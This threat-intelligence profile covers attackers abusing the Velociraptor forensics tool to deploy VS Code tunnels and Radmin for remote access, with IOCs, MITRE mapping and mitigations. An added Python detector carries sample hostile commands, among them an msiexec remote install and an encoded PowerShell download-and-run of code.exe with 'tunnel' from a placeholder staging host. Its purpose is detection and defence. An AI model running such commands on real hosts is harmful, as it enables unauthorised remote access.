This approach represents an evolution from threat actors abusing remote monitoring and management tools.
# Tool/Technique: Velociraptor Abuse for Remote Access
## Overview
Threat actors are abusing Velociraptor, a legitimate open-source Digital Forensics and Incident Response (DFIR) tool, to gain remote access to victim hosts and potentially deploy follow-on malware such as ransomware. In the reported incident, Velociraptor was used to download and execute Visual Studio Code with its tunnelling feature enabled, establishing a connection to an attacker-controlled C2 server.
## Technical Details
- Type: Tool (Abused legitimate software)
- Platform: Windows (Implied by use of `msiexec` and PowerShell)
- Capabilities: Initial foothold establishment, downloading subsequent tools, establishing remote access via tunneling.
- First Seen: August 2025 (in this reported incident)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Implied by HTTP/S usage to Cloudflare Workers domains)
- T1105 - Ingress Tool Transfer (`v2.msi`, `code.exe` and Radmin pulled from the staging domain)
- T1219 - Remote Access Software (Velociraptor, Radmin and the VS Code tunnel all function as remote access tooling)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0010 - Exfiltration (Potential precursor)
- TA0005 - Defense Evasion
- T1218 - System Binary Proxy Execution
- T1218.007 - Msiexec (use of `msiexec` to install a package fetched from a remote URL)
## Functionality
### Core Capabilities
- Deployment of Velociraptor via the `msiexec` utility, which accepts a URL as the package path and so downloads and installs the MSI (`v2.msi`) in a single command.
- Communication with a C2 server (`velo[.]qaubctgg[.]workers[.]dev`).
- Downloading and executing Visual Studio Code (`code.exe`) using an encoded PowerShell command.
### Advanced Features
- **Remote Access Tunneling:** Launching Visual Studio Code with its tunnel option enabled (the `code tunnel` CLI verb) to create a persistent channel to the attacker, giving them an interactive remote session with shell and file access on the host. Note that VS Code's tunnel feature registers the host with Microsoft's Dev Tunnels relay service, so the outbound connection itself goes to Microsoft-owned infrastructure and resembles ordinary developer traffic; the attacker reaches the host through that relay.
- **Staging via Cloudflare Workers:** Utilizing attacker-controlled Cloudflare Workers domains (`files[.]qaubctgg[.]workers[.]dev`) as staging areas for tools (`v2.msi`, Radmin, `code.exe`).
## Indicators of Compromise
- File Hashes: [Not specifically provided in the text]
- File Names: `v2.msi`, `code.exe` (Visual Studio Code), `sc.msi` (additional malware installer)
- Registry Keys: [Not explicitly mentioned]
- Network Indicators:
- Staging Domain: `files[.]qaubctgg[.]workers[.]dev` (defanged)
- C2 Domain: `velo[.]qaubctgg[.]workers[.]dev` (defanged)
- Behavioral Indicators:
- Use of `msiexec` to install a package fetched from a remote URL, in this case delivering remote access/tunneling tools.
- Execution of Visual Studio Code (`code.exe`) with the `tunnel` option on the command line, including when that command line is hidden inside an encoded PowerShell argument.
- The Velociraptor process spawning PowerShell, which in turn launches VS Code.
## Associated Threat Actors
- Multiple threat groups confirmed to have abused the Visual Studio Code tunneling feature in the past. (Specific actor name for this incident is not disclosed).
## Detection Methods
- Signature-based detection: Sophos detections listed: `Troj/Agent-BLMR`, `Troj/BatDl-PL`, `Troj/Mdrop-KDK`.
- Behavioral detection: Detection of the Visual Studio Code tunnel option triggering an alert (provided by Taegis™). Monitoring for unauthorized use of Velociraptor.
- YARA rules: [Not available in the text]
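To make the behavioural indicators above concrete, here is an added example (not code from the Sophos report or from the Velociraptor project) that scores process-creation events for the chain described on this page: `msiexec` installing from a remote URL, `code.exe` launched with the `tunnel` verb, a Velociraptor parent spawning an interpreter, and an encoded PowerShell command whose decoded body contains a download or a tunnel launch. The event shape mirrors Sysmon Event ID 1 (ParentImage, Image, CommandLine); the sample events, the `example.invalid` staging host and the PowerShell one-liner are constructed for the example and are not indicators from the report.

```python
"""Process-creation heuristics for the Velociraptor / VS Code tunnel chain.

Added example, not code from the report. Events are constructed here in a
Sysmon Event ID 1-like shape; real input would come from your EDR/Sysmon feed.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# msiexec accepts a URL as the package path, so a URL in its command line is
# the marker for a remote install rather than a local package.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# `code tunnel` is the VS Code CLI verb that registers the host with the
# Dev Tunnels relay; match it only as a standalone argument.
TUNNEL_ARG = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(
    r"(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# Children worth flagging under a Velociraptor parent on a host where the
# tool is not expected to drive interactive sessions.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "code.exe", "msiexec.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(command_line: str):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev: ProcEvent) -> list:
    """Return the list of rule names the event triggers (empty if benign)."""
    hits = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line
    if image == "msiexec.exe" and REMOTE_URL.search(cmd):
        hits.append("msiexec_remote_install")
    if image == "code.exe" and TUNNEL_ARG.search(cmd):
        hits.append("vscode_tunnel")
    if parent == "velociraptor.exe" and image in INTERPRETERS:
        hits.append("velociraptor_spawns_interpreter")
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        hits.append("encoded_powershell")
        # Re-apply the content rules to the decoded script, not the base64 blob.
        if REMOTE_URL.search(decoded):
            hits.append("encoded_remote_download")
        if "code" in decoded.lower() and TUNNEL_ARG.search(decoded):
            hits.append("encoded_vscode_tunnel")
    return hits


def scan(events) -> list:
    """Return (index, hits) for every event that triggers at least one rule."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


STAGING = "https://files.example.invalid"  # constructed placeholder staging host

# Constructed sample events: three malicious (mirroring the reported chain) and
# two benign (a local MSI install, VS Code opening a folder).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              f"msiexec /i {STAGING}/v2.msi /qn"),
    ProcEvent(r"C:\Program Files\Velociraptor\Velociraptor.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc " + encode_powershell(
                  f"Invoke-WebRequest {STAGING}/code.exe -OutFile C:\\Users\\Public\\code.exe; "
                  "C:\\Users\\Public\\code.exe tunnel")),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\Public\code.exe", r"C:\Users\Public\code.exe tunnel"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\alice\Downloads\7zip.msi"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft VS Code\Code.exe",
              r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\project'),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

The decode step matters because the report describes the VS Code download and launch arriving inside an encoded PowerShell command; matching only the raw command line would miss the `tunnel` verb entirely. The Velociraptor-parent rule is deliberately narrow: on hosts where Velociraptor is deployed by your own IR team, tune it to the server URL your client configuration points at rather than to the process name alone.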
## Mitigation Strategies
- Deploy Endpoint Detection and Response (EDR) tooling and ensure it has coverage for process-creation telemetry (parent/child relationships and full command lines), since every indicator in this incident is behavioural rather than file-based.
- Monitor for and investigate unexpected or unauthorized use of legitimate tools such as Velociraptor; where it is deployed legitimately, baseline the server URL in the client configuration and alert on agents pointing elsewhere.
- Restrict `msiexec` installs from remote URLs and block or alert on VS Code tunnel usage on hosts where developers do not need it.
- Follow standard hardening practice and maintain tested, offline backups to limit the impact of a follow-on ransomware deployment.
- Isolate affected hosts immediately upon detection.
## Related Tools/Techniques
- Remote Monitoring and Management (RMM) tools (general category of abused software).
- Radmin (mentioned as being staged alongside Velociraptor components).
- SimpleHelp (mentioned in context of prior RMM vulnerabilities).
- Quick Assist (mentioned in context of prior malware approaches).